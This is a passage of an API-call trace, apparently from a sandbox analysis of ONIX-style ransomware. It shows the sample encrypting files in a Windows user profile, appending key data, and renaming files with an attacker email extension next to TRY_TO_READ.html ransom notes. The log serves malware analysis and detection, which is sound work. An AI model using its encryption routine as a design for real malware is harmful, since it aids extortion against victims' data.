cAlternateFileName="")) returned 1 [0121.501] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c0 [0121.501] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.502] LockFile (hFile=0x4c0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x11a, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.502] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0121.502] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.502] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.502] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.502] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", dwFileAttributes=0x80) returned 1 [0121.502] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 54 [0121.502] GetProcessHeap () returned 0x410000 [0121.502] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xdc) returned 0x44faf8 [0121.502] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" [0121.502] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.502] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=282) returned 1 [0121.502] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x11a [0121.502] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.502] GetProcessHeap () returned 0x410000 [0121.502] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.502] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.504] WriteFile (in: hFile=0x4c0, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.507] WriteFile (in: hFile=0x4c0, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.508] WriteFile (in: hFile=0x4c0, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.509] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11a) returned 0x442938 [0121.509] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11a) returned 0x46a0f0 [0121.509] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.509] ReadFile (in: hFile=0x4c0, lpBuffer=0x442938, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x11a, lpOverlapped=0x0) returned 1 [0121.509] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.509] WriteFile (in: hFile=0x4c0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x11a, lpOverlapped=0x0) returned 1 [0121.510] UnlockFile (hFile=0x4c0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x11a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.511] CloseHandle (hObject=0x4c0) returned 1 [0121.512] GetProcessHeap () returned 0x410000 [0121.512] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.512] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.514] GetProcessHeap () returned 0x410000 [0121.514] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.514] FindNextFileW (in: hFindFile=0x48ef70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d2b90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328d2b90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328d2b90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0121.515] FindNextFileW (in: hFindFile=0x48ef70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d2b90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328d2b90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328d2b90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0121.515] CloseHandle (hObject=0x3cc) returned 1 [0121.515] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.515] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x381)) [0121.515] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.515] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.515] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.515] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches9c354ca09c354b444c.lock") returned 62 [0121.515] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.516] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.516] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.516] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b19b0 [0121.516] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x328d2b90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328d2b90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48efb0 [0121.516] FindNextFileW (in: hFindFile=0x48efb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x328d2b90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328d2b90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0121.516] FindNextFileW (in: hFindFile=0x48efb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0121.516] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c4 [0121.517] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.517] LockFile (hFile=0x4c4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x20c, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.517] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0121.517] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.517] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.517] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.517] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini", dwFileAttributes=0x80) returned 1 [0121.517] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 51 [0121.517] GetProcessHeap () returned 0x410000 [0121.517] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd6) returned 0x44faf8 [0121.517] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" [0121.517] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.517] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=524) returned 1 [0121.517] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x20c [0121.517] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.517] GetProcessHeap () returned 0x410000 [0121.517] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.517] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.518] WriteFile (in: hFile=0x4c4, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.521] WriteFile (in: hFile=0x4c4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.522] WriteFile (in: hFile=0x4c4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20c) returned 0x442938 [0121.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20c) returned 0x46a0f0 [0121.523] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.523] ReadFile (in: hFile=0x4c4, lpBuffer=0x442938, nNumberOfBytesToRead=0x20c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x20c, lpOverlapped=0x0) returned 1 [0121.523] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=-524, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.523] WriteFile (in: hFile=0x4c4, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x20c, lpOverlapped=0x0) returned 1 [0121.524] UnlockFile (hFile=0x4c4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x20c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.524] CloseHandle (hObject=0x4c4) returned 1 [0121.526] GetProcessHeap () returned 0x410000 [0121.526] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.526] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.528] GetProcessHeap () returned 0x410000 [0121.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.528] FindNextFileW (in: hFindFile=0x48efb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0121.528] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0121.528] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.528] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0121.528] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.528] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.528] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.528] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", dwFileAttributes=0x80) returned 1 [0121.529] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 60 [0121.529] GetProcessHeap () returned 0x410000 [0121.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe8) returned 0x467908 [0121.529] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" [0121.529] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.529] GetProcessHeap () returned 0x410000 [0121.529] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0121.529] CloseHandle (hObject=0xffffffff) returned 0 [0121.529] FindNextFileW (in: hFindFile=0x48efb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0121.529] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0121.529] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.529] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0121.529] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.530] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8c88 | out: pbBuffer=0x4d8c88) returned 1 [0121.530] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2790 | out: pbBuffer=0x4b2790) returned 1 [0121.530] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x80) returned 1 [0121.530] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 67 [0121.530] GetProcessHeap () returned 0x410000 [0121.530] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf6) returned 0x44fb90 [0121.530] lstrcpyW (in: lpString1=0x44fb90, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" [0121.530] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.530] GetProcessHeap () returned 0x410000 [0121.530] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb90 | out: hHeap=0x410000) returned 1 [0121.530] CloseHandle (hObject=0xffffffff) returned 0 [0121.530] FindNextFileW (in: hFindFile=0x48efb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d2b90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328d2b90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328d2b90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0121.530] FindNextFileW (in: hFindFile=0x48efb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d2b90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328d2b90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328d2b90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0121.530] CloseHandle (hObject=0x3cc) returned 1 [0121.530] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.531] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x391)) [0121.531] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.531] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.531] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.531] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo9c354ca09c354b444c.lock") returned 60 [0121.531] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.531] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.532] VirtualFree (lpAddress=0x2a0000, 